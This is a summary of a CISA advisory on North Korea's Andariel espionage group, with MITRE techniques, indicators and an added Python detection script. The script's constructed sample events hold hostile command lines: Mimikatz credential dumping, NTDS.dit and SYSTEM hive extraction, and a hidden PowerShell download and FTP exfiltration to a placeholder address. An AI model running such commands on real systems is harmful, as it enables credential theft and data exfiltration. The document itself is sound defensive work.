CISA Advisory AA24-207A: North Korean Cyber Group Engages in Global Espionage to Support Military and Nuclear Advancements

U.S. and allied agencies warn that North Korea’s RGB 3rd Bureau, via the Andariel group, is conducting global cyber espionage to advance the regime’s military and nuclear programs. AttackIQ provides post-compromise TTP templates to help defenders emulate Andariel’s behaviors, while intelligence from Mandiant and Microsoft details the group’s tools and operations. #Andariel #MauiRansomware #RGB3rdBureau #LazarusGroup #Log4j #Mimikatz #NTDSdit

Keypoints

  • North Korea’s Andariel (tracked as a Lazarus subgroup) operates under the DPRK RGB 3rd Bureau and conducts global espionage on its behalf.
  • Primary targets include government, defense, aerospace, nuclear, and engineering entities to obtain sensitive technical information.
  • Initial access commonly comes from exploiting web server vulnerabilities (e.g., Log4j) and phishing with LNK/HTA attachments.
  • Post-compromise activity includes persistence via Scheduled Tasks, credential dumping with Mimikatz, and broad discovery.
  • Lateral movement uses RDP; additional tooling is delivered by Ingress Tool Transfer (e.g., PowerShell Invoke-WebRequest downloads), and collected data is exfiltrated over FTP.
  • AttackIQ’s assessment templates emulate Andariel’s post‑compromise TTPs to test defenses and detection capabilities.
  • Additional intelligence from Mandiant and Microsoft highlights tools, lifecycle, and ongoing threat context; expansion ideas include AD data dumps, keylogging, screen capture, and code injection techniques.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Exploitation of web servers running software with known vulnerabilities, such as Log4j, to deploy a web shell and gain access to sensitive information and applications for further exploitation.
  • [T1566.001] Phishing: Spearphishing Attachment – Malicious attachments, including Windows Shortcut (LNK) files or HTML Application (HTA) scripts, delivered inside encrypted or unencrypted ZIP archives.
  • [T1053.005] Scheduled Task/Job: Scheduled Task – Persistence through creation of a new scheduled task with the schtasks utility.
  • [T1003] OS Credential Dumping – An obfuscated build of Mimikatz dumps passwords and hashes for Windows accounts.
  • [T1082] System Information Discovery – The native systeminfo command retrieves the Windows system information.
  • [T1083] File and Directory Discovery – The dir command enumerates files and directories.
  • [T1087] Account Discovery – The native net user command lists additional accounts known to the infected host.
  • [T1049] System Network Connections Discovery – netstat lists remote connections established to and from the infected asset.
  • [T1087.002] Account Discovery: Domain Account – The AdFind utility enumerates the victim’s Active Directory configuration, including accounts, groups, computers, and subnets.
  • [T1021.001] Remote Services: Remote Desktop Protocol – Lateral movement within the network over RDP.
  • [T1105] Ingress Tool Transfer – Two scenarios, one downloading a payload to memory and one saving it to disk, test whether network and endpoint controls prevent delivery of known malicious payloads.
  • [T1048] Exfiltration Over Alternative Protocol – An FTP connection to an AttackIQ server emulates exfiltration of sensitive information from the compromised system.
  • [T1057] Process Discovery – The Windows built-in tasklist command enumerates running processes; the results are saved to a file in a temporary location.
  • [T1059.001] Command and Scripting Interpreter: PowerShell – PowerShell activity such as downloading data with Invoke-WebRequest (alias iwr).
  • [T1055] Process Injection – Process Hollowing: a process is created in a suspended state, its memory is unmapped, and the mapping is replaced with the contents of a malicious executable.
  • [T1134] Access Token Manipulation – Lists active access tokens that another process could impersonate.
  • [T1021.004] Remote Services: SSH – Opens a remote shell and executes commands on target computers over SSH.
  • [T1007] System Service Discovery – Microsoft’s native sc utility queries the list of running services.
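A defender running these emulations wants to know which of the steps above their telemetry actually catches. The following Python pass is an added example, not AttackIQ, CISA or Mandiant detection content: it applies simple command-line rules for the techniques listed above to a handful of constructed process-creation events and then flags any host that shows several distinct discovery techniques inside one short window, which is the shape of the post-compromise sequence the advisory describes. The pipe-separated event layout, hostnames, user names, file paths and the 203.0.113.10 address are all constructed for the illustration; the rules are deliberately minimal and are commented where they would miss something.

```python
"""Toy detection pass for the Andariel post-compromise TTPs listed above.

Added example: the event format (pipe-separated process-creation records)
and the sample lines are constructed for this illustration; the patterns
are not AttackIQ's, CISA's or any vendor's detection content.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed events: timestamp|host|user|image|command line
SAMPLE_EVENTS = r"""
2024-07-26T09:00:01Z|WS01|CORP\jdoe|C:\Windows\System32\schtasks.exe|schtasks /create /sc minute /mo 10 /tn "Updater" /tr C:\Users\Public\svc.exe /ru SYSTEM
2024-07-26T09:00:40Z|WS01|CORP\jdoe|C:\Windows\System32\cmd.exe|cmd /c systeminfo > C:\Users\Public\s.txt
2024-07-26T09:01:05Z|WS01|CORP\jdoe|C:\Windows\System32\net.exe|net user
2024-07-26T09:01:30Z|WS01|CORP\jdoe|C:\Windows\System32\NETSTAT.EXE|netstat -ano
2024-07-26T09:02:10Z|WS01|CORP\jdoe|C:\Users\Public\adfind.exe|adfind.exe -f objectcategory=computer
2024-07-26T09:02:40Z|WS01|CORP\jdoe|C:\Windows\System32\tasklist.exe|tasklist /v > C:\Users\Public\t.txt
2024-07-26T09:03:00Z|WS01|CORP\jdoe|C:\Users\Public\mk.exe|mk.exe "privilege::debug" "sekurlsa::logonpasswords" exit
2024-07-26T09:04:12Z|DC01|NT AUTHORITY\SYSTEM|C:\Windows\System32\vssadmin.exe|vssadmin create shadow /for=C:
2024-07-26T09:04:30Z|DC01|NT AUTHORITY\SYSTEM|C:\Windows\System32\cmd.exe|cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\Temp\n.dit
2024-07-26T09:04:45Z|DC01|NT AUTHORITY\SYSTEM|C:\Windows\System32\reg.exe|reg save HKLM\SYSTEM C:\Temp\sys.hiv
2024-07-26T09:05:00Z|WS01|CORP\jdoe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -nop -w hidden -c "IWR http://203.0.113.10/a.dat -OutFile C:\Users\Public\a.dat"
2024-07-26T09:06:00Z|WS01|CORP\jdoe|C:\Windows\System32\ftp.exe|ftp -s:C:\Users\Public\cmds.txt 203.0.113.10
2024-07-26T10:30:00Z|WS02|CORP\admin|C:\Windows\System32\schtasks.exe|schtasks /query /tn "\Microsoft\Windows\Defrag\ScheduledDefrag"
"""

# (technique ids, label, pattern applied to "image + ' ' + command line")
RULES = [
    (("T1053.005",), "Persistence: schtasks /create",
     re.compile(r"\bschtasks(\.exe)?\b.*\s/create\b", re.I)),
    # Match Mimikatz module syntax, not the file name: an obfuscated or renamed
    # build (as the page describes) still has to pass sekurlsa::/lsadump:: on
    # its command line. Reflective in-memory loads will not show up here.
    (("T1003",), "Credential dumping: Mimikatz module syntax",
     re.compile(r"sekurlsa::|lsadump::|\bmimikatz\b", re.I)),
    # ntds.dit is locked while AD DS runs, so it is copied from a shadow copy;
    # the SYSTEM hive holds the boot key needed to decrypt the hashes in it.
    (("T1003.003",), "AD database collection: shadow copy / ntds.dit / SYSTEM hive",
     re.compile(r"\bvssadmin(\.exe)?\s+create\s+shadow\b|ntds\.dit|"
                r"\breg(\.exe)?\s+save\s+hklm\\system\b", re.I)),
    (("T1082",), "Discovery: systeminfo", re.compile(r"\bsysteminfo(\.exe)?\b", re.I)),
    (("T1087",), "Discovery: net user", re.compile(r"\bnet1?(\.exe)?\s+user\b", re.I)),
    (("T1087.002",), "Discovery: AdFind", re.compile(r"\badfind(\.exe)?\b", re.I)),
    (("T1049",), "Discovery: netstat", re.compile(r"\bnetstat(\.exe)?\b", re.I)),
    (("T1057",), "Discovery: tasklist", re.compile(r"\btasklist(\.exe)?\b", re.I)),
    (("T1007",), "Discovery: sc query", re.compile(r"\bsc(\.exe)?\s+query\b", re.I)),
    (("T1059.001", "T1105"), "PowerShell download cradle (IWR / Invoke-WebRequest)",
     re.compile(r"\b(iwr|invoke-webrequest)\b", re.I)),
    # Scripted ftp.exe (-s:) is the non-interactive form; an interactive session
    # carries no such flag, so pair this with network telemetry on port 21.
    (("T1048",), "Exfiltration: scripted ftp.exe session",
     re.compile(r"\bftp(\.exe)?\b.*\s-s:", re.I)),
]
# dir (T1083) is deliberately absent: on its own it is far too noisy to alert on.

DISCOVERY = {"T1082", "T1087", "T1049", "T1057", "T1007", "T1083"}


def parse_events(text):
    events = []
    for line in text.strip().splitlines():
        ts, host, user, image, cmdline = line.split("|", 4)
        events.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                       "host": host, "user": user, "image": image, "cmdline": cmdline})
    return events


def match_event(event):
    """Return (technique id, label) pairs whose pattern fires on this event."""
    haystack = f"{event['image']} {event['cmdline']}"
    hits = []
    for ids, label, pattern in RULES:
        if pattern.search(haystack):
            hits.extend((tid, label) for tid in ids)
    return hits


def discovery_bursts(hits, window=timedelta(minutes=10), threshold=3):
    """Per host, the largest number of distinct discovery techniques (parent id,
    so T1087 and T1087.002 count once) seen inside one sliding window; hosts at
    or above the threshold are returned as {host: count}."""
    per_host = defaultdict(list)
    for ts, host, tid, _label in hits:
        parent = tid.split(".")[0]
        if parent in DISCOVERY:
            per_host[host].append((ts, parent))
    bursts = {}
    for host, items in per_host.items():
        items.sort()
        best = 0
        for i, (start, _) in enumerate(items):
            seen = {tid for ts, tid in items[i:] if ts - start <= window}
            best = max(best, len(seen))
        if best >= threshold:
            bursts[host] = best
    return bursts


def detect(text):
    hits = []
    for ev in parse_events(text):
        for tid, label in match_event(ev):
            hits.append((ev["ts"], ev["host"], tid, label))
    return {"hits": hits, "bursts": discovery_bursts(hits)}


if __name__ == "__main__":
    result = detect(SAMPLE_EVENTS)
    for ts, host, tid, label in result["hits"]:
        print(f"{ts:%H:%M:%S} {host:5} {tid:10} {label}")
    print("discovery bursts:", result["bursts"])
```

Run against the sample, WS01 produces one hit per emulated step from scheduled-task persistence through the FTP session, DC01 produces three hits from the shadow-copy NTDS.dit collection, and WS02's routine schtasks /query produces none; only WS01 crosses the discovery-burst threshold. The burst correlation is the part worth keeping when the individual rules are tuned down for noise, because a single systeminfo or net user is unremarkable while four different discovery commands from one host in ten minutes is the pattern the advisory describes.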

Indicators of Compromise

  • [File Name] NTDS.dit – Active Directory database file targeted for extraction; it is locked while AD DS is running, hence the plan to copy it out of a Volume Shadow Copy.
  • [File Name] SYSTEM – Registry hive extracted alongside NTDS.dit during the AD data dump; it holds the boot key needed to decrypt the password hashes stored in the database.
  • [Executable] vssadmin.exe – used to create Volume Shadow Copy as part of data collection.
  • [Executable] schtasks – used to create persistence via Scheduled Tasks.
  • [Tool/Software] Mimikatz – obfuscated credential dumping tool.
  • [Malware/Family] Maui Ransomware – ransomware attributed to Andariel, referenced as having been used against healthcare organizations.
  • [Threat Actor] Andariel – North Korean state-sponsored adversary (Lazarus subgroup).
  • [Phishing Artifacts] LNK and HTA scripts in ZIP archives – phishing delivery mechanisms.
  • [Vulnerability/Software] Log4j – vulnerable logging library exploited on public-facing web servers to deploy a web shell and gain initial access.

Read more: https://www.attackiq.com/2024/07/26/response-to-cisa-advisory-aa24-207a/